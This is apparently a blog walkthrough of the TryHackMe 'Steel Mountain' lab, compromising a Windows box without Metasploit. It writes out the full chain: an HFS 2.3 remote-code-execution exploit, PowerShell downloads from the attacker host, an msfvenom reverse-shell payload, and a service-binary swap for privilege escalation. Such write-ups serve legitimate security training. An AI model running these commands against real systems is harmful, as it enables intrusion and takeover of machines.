TryHackMe — Steel Mountain w/o MSF

3 min readSep 5, 2020

--

Utilize PowerShell commands and winPEAS to enumerate the system and collect the relevant information to escalate privilege.

Machine Information:

[1]NMAP Scan

sudo nmap -A -T -p- 10.10.255.1 -oN nmap_scan

[2]Research vulnerability

searchsploit hfs 2.3
searchsploit -x 39161.py

[3]Edit exploit

[4]Setup HTTP server to serve nc.exe and winPEAS

sudo python -m SimpleHTTPServer 80

[5]Setup a netcat listener then run exploit

nc -lvnp 4444

python exploit.py 10.10.255.1 8080

[6]Download winPEAS for Privilege Escalation

powershell -c “Invoke-WebRequest -OutFile winPEAS.exe http://10.11.17.48/winPEAS.exe”

[7]Run winPEAS

winPEAS.exe

[8]Create msfvenom payload and setup a netcat listener

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.17.48 LPORT=1234 -f exe -o ASCService.exe

nc -lvnp 1234

[9]Stop service

sc stop AdvancedSystemCareService9

[10]Download payload under the directory of the target service then start service

powershell -c “Invoke-WebRequest -OutFile ASCService.exe http://10.11.17.48/ASCService.exe"

sc start AdvancedSystemCareService9

References:

https://tryhackme.com/room/steelmountain

Offensive Security's Exploit Database Archive

usr/bin/python # Exploit Title: HttpFileServer 2.3.x Remote Command Execution # Google Dork: intext:"httpfileserver…

www.exploit-db.com

andrew-d/static-binaries

You can't perform that action at this time. You signed in with another tab or window. You signed out in another tab or…

github.com

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

Written by Clarence Subia

Network Engineer / Penetration Tester

No responses yet

Help
Status
About
Careers
Press
Blog
Privacy
Terms
Text to speech
Teams